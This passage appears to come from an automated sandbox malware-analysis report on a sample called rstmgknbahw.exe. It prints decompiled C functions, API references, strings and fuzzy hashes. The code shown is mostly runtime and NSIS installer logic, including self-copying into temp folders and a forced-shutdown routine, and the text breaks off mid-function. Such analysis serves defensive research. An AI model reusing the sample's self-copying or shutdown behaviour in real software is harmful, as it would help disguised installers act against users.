				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x58c4579
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

0x004062c0
0x004062c7
0x004062ca
0x004062d3
0x004062d8
0x004062dd
0x004062e2
0x004062e5
0x004062e7
0x004062e7
0x004062ec
0x00406305
0x0040630b
0x00406310
0x004063af
0x004063b3
0x004063b8
0x004063b8
0x004063cc
0x004063d4
0x004063d4
0x00406316
0x00406319
0x0040631e
0x00406322
0x0040636e
0x00406370
0x00406372
0x00406377
0x0040638e
0x00406396
0x004063a6
0x004063a6
0x00406396
0x004063a8
0x004063a9
0x00000000
0x004063ae
0x00406324
0x00406329
0x0040632b
0x0040632d
0x0040632d
0x00406335
0x00406352
0x0040635c
0x00406361
0x00000000
0x00000000
0x00406363
0x00406369
0x00406369
0x00000000
0x00406369
0x00406339
0x0040633d
0x00406342
0x00406346
0x00000000
0x00000000
0x00406348
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
__alloca_probe_16.LIBCMT ref: 0040633D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
__freea.LIBCMT ref: 004063A9

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405751 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x58c457a
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00405756
0x0040575a
0x00405761
0x00405765
0x00405773
0x00405789
0x0040578d
0x004057b6
0x004057b8
0x004057bc
0x004057bf
0x004057bf
0x004057c5
0x004057c7
0x00000000
0x004057c8
0x0040578f
0x00405798
0x004057a7
0x0040579a
0x0040579d
0x004057a3
0x004057a3
0x004057ab
0x00000000
0x004057ad
0x004057b0
0x004057b2
0x00000000
0x004057b2
0x004057ab
0x00405767
0x0040576c
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D

Memory Dump Source

Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00404320 Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00404320
0x00404320
0x00404320
0x0040432a
0x0040432c
0x00404331
0x00404334
0x00404342
0x00404349
0x0040434e
0x00404351
0x00404354
0x00404366
0x0040436b
0x0040436d
0x00404378
0x0040437f
0x00404384
0x00404387
0x00404389
0x00000000
0x00000000
0x00000000
0x00000000
0x0040436f
0x0040436f
0x00000000
0x0040436f
0x00404356
0x00404356
0x00404357
0x00404357
0x0040435c
0x00404397
0x00404398
0x0040439e
0x004043a3
0x004043a6
0x004043a7
0x004043a8
0x004043af
0x004043b1
0x004043b3
0x004043b8
0x004043bb
0x004043c9
0x004043d5
0x004043d8
0x004043db
0x004043ed
0x004043f2
0x004043f4
0x004043ff
0x00404405
0x0040440d
0x0040440f
0x00000000
0x00000000
0x00000000
0x00000000
0x004043f6
0x004043f6
0x00000000
0x004043f6
0x004043dd
0x004043dd
0x004043de
0x004043de
0x00404411
0x00404412
0x00404412
0x004043bd
0x004043c3
0x004043c7
0x0040441a
0x0040441b
0x00404421
0x00000000
0x00000000
0x00000000
0x004043c7
0x00404428
0x00404428
0x00404336
0x0040433c
0x00404340
0x0040438b
0x0040438c
0x00404396
0x00000000
0x00000000
0x00000000
0x00404340

APIs

GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
_abort.LIBCMT ref: 0040439E

Memory Dump Source

Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 004025BA Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004025ba
0x004025bf
0x004025cb
0x004025d0
0x004025d5
0x004025d7
0x004025e2
0x004025d9
0x004025d9
0x00000000
0x004025d9
0x004025cd
0x004025cd
0x004025cf
0x004025cf

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4

Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9

Memory Dump Source

Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

Uniqueness

Uniqueness Score: -1.00%

Function 00405575 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}

0x0040557b
0x00405586
0x0040558d

APIs

GetCommandLineA.KERNEL32 ref: 00405575
GetCommandLineW.KERNEL32 ref: 00405580

Strings

3i, xrefs: 0040557B

Memory Dump Source

Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: 3i
API String ID: 3253501508-607397968
Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rstmgknbahw.exePID: 4296, Parent PID: 3424COMMON

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1257
Total number of Limit Nodes:	24

Executed Functions

Function 00403225 Relevance: 73.8, APIs: 23, Strings: 19, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85("heifsmlbdxlebvytfzg Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34; // 0x0
											if(__eflags != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x423ebc; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy";
										if(lstrcmpiA(_t105, "C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t101);
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x423eb0; // 0x753e70
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												_t77 =  *0x423eb0; // 0x753e70
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

APIs

#17.COMCTL32 ref: 00403244
SetErrorMode.KERNELBASE(00008001), ref: 0040324F
OleInitialize.OLE32(00000000), ref: 00403256

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00405A92

GetCommandLineA.KERNEL32(heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00403293
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000000), ref: 004032A6
CharNextA.USER32(00000000,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000020), ref: 004032D1
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
DeleteFileA.KERNELBASE(1033), ref: 00403398
OleUninitialize.OLE32(00000000), ref: 00403416
ExitProcess.KERNEL32 ref: 00403436
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000000,00000000), ref: 00403442
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000000,00000000), ref: 0040344E
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
CopyFileA.KERNEL32 ref: 004034BF
CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
ExitProcess.KERNEL32 ref: 004035A0

Strings

heifsmlbdxlebvytfzg Setup, xrefs: 00403289
C:\Users\user\AppData\Roaming\sspgadrjncoy, xrefs: 00403447, 0040344C, 0040346F
SeShutdownPrivilege, xrefs: 00403553
", xrefs: 004032F3
_?=, xrefs: 004033BF
"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" , xrefs: 00403299, 0040329F, 004033B5
C:\Users\user\AppData\Local\Temp, xrefs: 0040334F, 004033E8, 00403467, 00403470
\Temp, xrefs: 0040337F
/D=, xrefs: 00403327
C:\Users\user\AppData\Local\Temp\, xrefs: 00403359, 0040335E, 00403378, 00403384, 00403441, 0040344D, 00403459, 00403460, 00403500
NSIS Error, xrefs: 00403284
1033, xrefs: 00403393
~nsu.tmp, xrefs: 0040343C
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403235
C:\Users\user\AppData\Local\Temp, xrefs: 004033F3
NCRC, xrefs: 00403311
C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe, xrefs: 004034BA
Error launching installer, xrefs: 004033CE
p>u, xrefs: 00403499, 004034D0

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\sspgadrjncoy$C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$heifsmlbdxlebvytfzg Setup$p>u$~nsu.tmp
API String ID: 2278157092-1813836157
Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004053AA Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
